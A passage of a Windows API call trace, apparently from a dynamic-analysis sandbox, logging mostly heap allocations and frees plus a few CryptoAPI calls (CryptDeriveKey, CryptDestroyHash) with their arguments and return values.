0x2e54ec8 [0205.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0205.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0205.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c20 [0205.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0205.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.392] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0205.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0205.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.394] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0205.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0205.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0205.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0205.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0205.396] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.396] CryptDestroyHash (hHash=0xa87490) returned 1 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0205.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0205.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.398] RtlAllocateHeap 